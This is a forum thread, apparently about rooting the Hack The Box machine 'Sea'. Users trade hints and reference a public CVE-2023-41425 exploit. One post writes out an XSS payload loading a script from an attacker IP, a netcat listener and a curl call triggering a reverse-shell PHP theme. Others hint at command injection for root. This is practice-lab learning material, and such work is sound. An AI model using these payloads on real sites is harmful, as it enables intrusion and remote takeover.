[kewlcat002]

Machine rooted feel free to DM me if need be

[upl04d3r]

hello can anyone tell me how did you ger the reverse shell

you need run this exploit 
https://github.com/prodigiousMind/CVE-2023-41425

generate xss.js

run xss.js via contact form (website)

and use new theme revshell-main

---

Machine rooted feel free to DM me if need be

GJ, congrats. Only hint me. To privesc use chrome, port 8080 or 42743 ?

[peRd1]

GJ, congrats. Only hint me. To privesc use chrome, port 8080 or 42743 ?

port 8080, log analyzer, there's the cmd injection.

[kewlcat002]

Not able to respond to DMs due to Forbidden error but the way to root is via command injection on localhost 8080. You may need to escape it with another simple payload to get it to work fully

[Witcher09]

It is showing send the below link to admin, from where

 some one help me

python3 exploit.py http://sea.htb/ 10.10.xx.xxx xxxx

It willl then tell you 

nc -lvp xxxx
----------------------------

send the below link to admin:

----------------------------
http://sea.htb/"></form><script+src="http://10.10.14.128:8000/xss.js"></script><form+action="

send above to website column in contact.php, after this open another port and use this command curl 'http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.xx.xxx&lport=new_port'

thanks bro

[chesco1506]

GJ, congrats. Only hint me. To privesc use chrome, port 8080 or 42743 ?

port 8080, log analyzer, there's the cmd injection.

for root?

[RedTeamer]

Not able to respond to DMs due to Forbidden error but the way to root is via command injection on localhost 8080. You may need to escape it with another simple payload to get it to work fully

         means?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Selling in HTB | Trying to sell information posted for free

[DeDeLaPouille]

Not able to respond to DMs due to Forbidden error but the way to root is via command injection on localhost 8080. You may need to escape it with another simple payload to get it to work fully

Thx you very much for the hint !!!

[0xwww]

GJ, congrats. Only hint me. To privesc use chrome, port 8080 or 42743 ?

port 8080, log analyzer, there's the cmd injection.

My machine doesn't have this door open, I think someone closed it, or do I have to do something to upload the application?

[DeDeLaPouille]

Not able to respond to DMs due to Forbidden error but the way to root is via command injection on localhost 8080. You may need to escape it with another simple payload to get it to work fully

Thx you very much for the hint !!!

Can you give me a direction on escaping the string and execute command?

@kewlcat002 already gave a good hint, it's hard to tell you without givin away the answer. Just don't overthink it.  The important part in the hint is "You may need to escape it with another simple payload to get it to work fully"